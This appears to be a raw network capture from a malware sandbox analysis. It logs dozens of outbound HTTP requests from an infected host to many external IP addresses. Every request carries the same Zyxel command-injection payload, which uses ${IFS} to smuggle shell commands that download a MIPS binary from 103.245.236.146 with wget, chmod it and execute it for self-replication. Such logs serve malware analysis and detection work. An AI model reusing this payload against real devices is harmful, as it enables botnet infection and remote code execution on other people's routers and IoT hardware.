                                                        Jan 28, 2024 10:12:36.097979069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        629192.168.2.145636219.136.228.253443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.098012924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        630192.168.2.145094836.230.138.243443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.098052979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        631192.168.2.144216434.235.64.224443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.098093987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        632192.168.2.143946895.252.61.165443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.098109961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        633192.168.2.1437862146.37.226.8443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.098161936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        634192.168.2.144462259.229.61.202443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.098181009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        635192.168.2.1443706115.72.58.74443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.098225117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        636192.168.2.143434064.171.29.0443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.098252058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        637192.168.2.145386253.207.76.227443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.098295927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        638192.168.2.1451658114.135.200.16443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.098320007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        639192.168.2.1460080210.135.26.254443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.098364115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        640192.168.2.1440492219.78.30.229443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.098408937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        641192.168.2.1459506167.80.120.250443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.098437071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        642192.168.2.143846640.82.131.112443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.098488092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        643192.168.2.1455034110.235.83.163443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.098526001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        644192.168.2.143585053.134.20.84443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.098583937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        645192.168.2.1438620205.125.198.181443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.098717928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        646192.168.2.1443802108.242.242.129443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.098756075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        647192.168.2.145386088.245.169.196443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.098788023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        648192.168.2.1434634139.14.19.92443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.098815918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        649192.168.2.145461494.136.200.82443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:37.104722977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        650192.168.2.14347889.144.181.159443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:37.104747057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        651192.168.2.144955476.124.158.86443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:37.104782104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        652192.168.2.1438024171.247.179.157443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:37.104834080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        653192.168.2.145344678.166.152.73443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:37.104832888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        654192.168.2.1443966170.96.80.212443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:37.104886055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        655192.168.2.1460652142.81.198.211443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:37.104906082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        656192.168.2.1447208133.249.96.110443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:37.104918003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        657192.168.2.144886073.54.145.34443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:37.104968071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        658192.168.2.145149053.199.26.226443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:37.104999065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        659192.168.2.144411664.129.48.92443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:37.105031967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        660192.168.2.1459042164.199.159.189443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:37.105174065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        661192.168.2.1452290205.74.64.4443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.113924026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        662192.168.2.1446052153.243.220.83443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.113960028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        663192.168.2.1436070129.120.66.81443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.114001036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        664192.168.2.143487017.79.152.224443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.114038944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        665192.168.2.146024880.233.17.61443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.114068985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        666192.168.2.1444576191.128.4.196443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.114115953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        667192.168.2.145597897.86.245.102443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.114151955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        668192.168.2.1457544165.194.151.135443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.114180088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        669192.168.2.1448818138.49.172.15443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.114249945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        670192.168.2.144053417.87.46.113443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.114288092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        671192.168.2.1441848140.189.86.41443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.114336014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        672192.168.2.14412528.225.75.55443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.114367962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        673192.168.2.1438020222.236.243.111443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.114392042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        674192.168.2.1439244154.53.52.88443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.114459038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        675192.168.2.1444704165.13.247.186443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.114487886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        676192.168.2.1458638208.87.222.200443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.114531994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        677192.168.2.145641243.18.39.214443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.114552975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        678192.168.2.1449772170.220.103.167443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.114573956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        679192.168.2.145871019.52.93.59443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.114620924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        680192.168.2.145711817.107.158.188443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.114655018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        681192.168.2.143686890.88.8.19443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.114696980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        682192.168.2.1452582218.252.166.248443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.114732027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        683192.168.2.1455860222.157.72.105443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.114758968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        684192.168.2.144287094.38.174.62443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.114830971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        685192.168.2.145375265.21.168.47443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.114845037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        686192.168.2.143300286.51.4.252443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.114859104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        687192.168.2.1445032172.186.158.136443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.114913940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        688192.168.2.144250690.83.198.46443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.114942074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        689192.168.2.1456580162.189.102.93443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.114983082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
